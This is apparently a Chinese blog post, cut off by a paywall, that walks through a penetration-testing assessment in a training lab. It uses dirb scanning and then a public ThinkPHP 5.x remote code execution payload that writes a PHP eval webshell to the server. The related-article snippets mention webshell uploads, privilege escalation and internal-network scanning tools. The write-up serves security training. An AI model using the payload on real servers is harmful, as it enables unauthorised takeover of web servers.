合天网安的渗透测试考核过程

最新推荐文章于 2024-05-15 22:56:29 发布
最新推荐文章于 2024-05-15 22:56:29 发布
阅读量1k 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59424416/article/details/125407405
版权

首先拿到考核内容的ip之后,我们首先进行渗透测试的第一个内容就是 信息收集:

使用kali自带的dirb对目标网站进行一个扫描,同理,类似的软件还有dirsearch

当然,这里使用自带的也可以用,个人感觉,dirb好用一点:

小提示;就是考核用的靶场,大家就看看,了解一下应用的过程

然后根据扫出来的结果,访问一下这些页面:

发现这个是用的thinkphp5.1的版本,而我们知道的就是thinkphp5.x版本的都存在漏洞,这些漏洞都是被爆出来过的,所以,在这里,直接在网上就可以找到可以利用的漏洞poc

比如我找到的这个

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1[]=muma.php&vars[1][]=%3C?php%20@eval($_POST['qwe']);?%3E

写出这个poc,可以通过burp抓包之后,上传上去,或者前面直接加上这个的网址,直接输入进去,

最低0.47元/天 解锁文章
m0_59424416
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透测试基础考试
m0_67855254的博客
05-13 326
启动靶场 docker-compose up -d 1 访问http://110.40.154.100:8000/,可以看到Django的默认页面 2. 然后我们访问http://110.40.154.100:8000/admin进入后台,输入账号密码进行登录 3. 登陆后台后,进入模型Collection的管理页面http://110.40.154.100:8000/admin/vuln/collection/ 4. ADD添加 5. 输入姓名学号 6. user.
天实验室:渗透试验项目二
再走一步
04-24 770
打开metasploit pro console(在开始->所有程序->Metasploit->Metasploit console) 正在上传…重新上传取消 检查目标主机端口开放情况 正在上传…重新上传取消 访问目标网站10.1.1.191 转存失败重新上传取消 访问目标网站的8889端口 转存失败重新上传取消 在C;\too...
渗透测试面试题
最新发布
Mr.xu的博客
05-15 1569
是一种浏览器实施的安全机制,用来限制不同源的文档或脚本之间的互相操作判断方式协议、域名、端口、ip地址,这些不同即为不同源信息收集是指通过各种方式获取所需要的信息,便于后续渗透过程更好的进行。​ 在HTTP 的HEAD中存在X-Forwarded-for参数的调用使用前提:X-Forword-For的值是*,那么就可以输入SQL语句来代替首先用单引号测试,显示报错的话,就可以构造恶意SQL语句。
天网实验室 渗透测试项目一
qq_55233040的博客
04-18 1256
利用网站漏洞获取该服务器shell;(网页关入侵–铜牌任务) 进入网站,找到文件上传口 写个一句话木马,上传,经过几次上传测试,发现是检测content-type,所以抓包,修改content-type为image/jpeg后上传 打开菜刀,设置连接 连接成功,任务1完成 新建一用户并将权限提升至管理员;(入侵提权–银牌任务) 找到cmd文件,右键打开虚拟终端 添加一个自己的用户 whoami /all 查看所有的组和用户,如图,管理员组可能是useras,尝试一下 将自己的用户添加到管理员组
网络渗透测试实验二(网络扫描与网络侦察)
YatKTm的博客
11-01 943
实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需要自行下载镜像);Nmap(Kali自带);WinHex、数据恢复工具(CBR)等 实验步骤: (hint)1-5题为被动扫描,利用搜索引擎或相关网站 百度使用小技巧,点一下有惊喜喔 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名
2023年网络安全面试题(渗透测试):详细答案解析与最佳实践分享
weixin_43263566的博客
07-18 1万+
命令执行漏洞指攻击者可以随意执行系统命令的漏洞。当攻击成功后,攻击者可以继承Web服务程序的权限,执行任意代码、读写文件,甚至控制整个网站或服务器,甚至进一步进行内网渗透。内网攻击莫忽视:在流量分析过程中,不要忽视内网的攻击行为。内网攻击可能是来自恶意软件、僵尸网络或内部威胁等,及时发现和响应内网攻击至关重要。企图告警需排查:当发出告警信号时,需要仔细排查可能的企图行为。不仅要关注被攻击的目标,还要查看攻击者的来源、攻击方法和可能的目的,以便更好地理解攻击行为。
fscan
热门推荐
good good study
11-10 2万+
fscan是一款内网综扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 下载地址:GitHub - shadow1ng/fscan 存活主机端口服务信息扫描 如下,默认会扫描存活主机、端口、漏洞等一些信息 fscan.exe -h ip或者网段 服务爆破
[内网渗透]—内网扫描
Sentiment的博客
12-08 2270
上传nbtscan和dll程序上传后用nbtscan命令扫描内网其他网段。
天网就业班_CSRF攻击实验 ——天网实验室学习笔记
weixin_39857480的博客
12-03 213
实验链接本实验以PHP和Mysql为环境,展示了CSRF攻击的原理和攻击过程。通过实验结果结对攻击代码的分析,可更直观清晰地认识到Web安全里这种常见的攻击方式。链接:天网实验室-国内大型MOOE在线实验室链接:天网实验室-国内大型MOOE在线实验室​sourl.cn实验简介实验所属系列:web攻防实验对象:本科/专科信息安全专业实验类别:实践实验类预备知识浏览器有关Cookie的设计缺...
基于FRP反向代理工具实现内网穿透攻击
道阻且长,行则将至。
07-15 5793
文章目录前言FRP反向代理内网环境搭建服务端的配置客户端的配置FRP内网穿透FRP进阶使用fscan内网神器总结 前言 当我们拿下目标单位的一台外网服务器后,需要借助外网服务器作为跳板机去开展内网渗透,这个时候必不可少的就是在跳板机上设置代理。在前面的文章中,曾经在实际案例中介绍了两种代理方式: Webshell 管理工具——冰蝎直接设置 HTTP 隧道代理实现内网穿透:2021强网杯全国网络安全挑战赛Writeup; Cobaltstrike 建立 Socks4 代理实现内网穿透:Cobaltstrik
关于fscanf乱码和死循环的解决方法
一夜知秋的博客
07-18 4285
近日学习fscanf的用法时,遇到了困难,出现2个问题: 1.读取数据为乱码。 2.出现死循环的情况。 以下为解决方法: 首先,数据乱码的问题,目前发现2种情况: 1.fscanf函数参数2的格式与文本不符,主要出现在中英文符号的问题上。 2.代码编码和txt文本的编码不符。 代码我用的是ANSI,但是不知道为什么txt文本的编码格式UTF-8,另存为ANSI格式就解决了我的问题。 其次是死循环的...
urlscan 64位系统使用
02-27
使用方法: 1、运行该文件、装urlscan; 2、按照自己的需求,修改配置文件urlscan.ini,具体配置方法请自行查找。
Kali装Fscan
bscryhf的博客
11-22 1006
如果没有没有出现版本号或之前版本号,输入:cp -f $GOROOT/bin/go* /usr/bin/ #退出之后,如果go version没有出现版本号,再次输入source /etc/profile即可。#👉如果执行编译时出现连接被拒绝情况,如:connection refused,执行:export GOPROXY=https://goproxy.io。5、下载fscan git clone https://github.com/shadow1ng/fscan.git。
最新渗透测试面试题
网络安全
05-17 1万+
⽹上整理的渗透测试⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。现在就是毕业季节,希望各位都能找到好工作。 渗透篇 1、介绍⼀下⾃认为有趣的挖洞经历 挖洞也有分很多种类型,⼀种是以渗透、⼀种是以找漏洞为主,如果是前者会想各种办法获取权限继⽽获取想要的的东⻄完成渗透⽬标,这类跟 HW 类似,⽬标各种漏洞不算,要有 Shell,服务器权限才给分,这才是最接近实战渗透,跟某部⻔有作的话也是属于这种打击⽹络犯罪获得权限、传销数据、组织架构,服务器权限、等…
关于C语言用fscanf写入中文的时候会乱码的解决办法 亲测有效
weixin_56211515的博客
04-01 3072
最近写代码用fscanf遇到写入中文的时候会有乱码,是assi码的显示方式。找了好多资料都没有解决。 目前网上搜到办法有:用宽字符型。但是没有用。 最简单的办法就是用notepad++在编码模式上选择assi模式,然后输入内容就可以得到中文了。 下面是不用assis编码模式的效果。 实际文档内容是 改为assi编码模式写重新输入 完美得到 源码如下大家可以自行验证。 #include <stdio.h> #include <stdlib.h> #..
渗透题5
白帽子九一
09-18 2912
1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说… 2.mysql的网站注入,5.0以上和5.0以下有什么区别? 5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。 5.0以下是多用户单操作,5.0以上是多用户多操做。 3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值? 丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。
推荐一个Web漏洞靶场
06-29 2260
https://github.com/zhuifengshaonianhanlu/pikachu 暂时先空着 装好是这样的 博主先去玩了,回来再写博客,2333 转载于:https://www.cnblogs.com/mke2fs/p/11108080.html...
CTF/天网实验室-web100题解【eval与alert的利用】
Sp4rkW的博客
08-15 7851
原题内容: http://www.hetianlab.com/CTFrace.html web100打开可以看到只有一个很干净的zip文件下载(忍不住扫了一下目录,也bp看了一下,,没啥发现) 回到下载,解开压缩版,web100,无后缀名,个人的经验是不急着加后缀名啥的,直接用记事本直接打开 可得代码如下: &lt;script&gt;_='function $(){e=g...
天网实验室:CTF-MISC练习
只为成最好的自己
07-14 2355
如何判断密文的加密方式: 1、如果密文是十进制,字符范围是“0-9”,可以猜测是ASCII编码; 2、如果密文由“a-z”、“A-Z”和“=”构成,特别是末尾有“=”,那么判断可能是Base64编码; 3、如果密文有“%”,形式为“%xx”和“%uxxxx”,字符范围又是十六进制的“0-F”,判断是escape()函数编码,用unescape()解码; 4、如果密文由“[],(),{},+
江西天网工程设计规范详解:构建安全监控体系
"本文档详细介绍了江西省社会治视频监控‘天网’工程的设计规范和施工方案。首先,章节一阐述了项目背景,强调了在当前社会稳定与经济发展形势下,实施‘天网’工程对于维护社会稳定、促进民生保障的重要性。该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值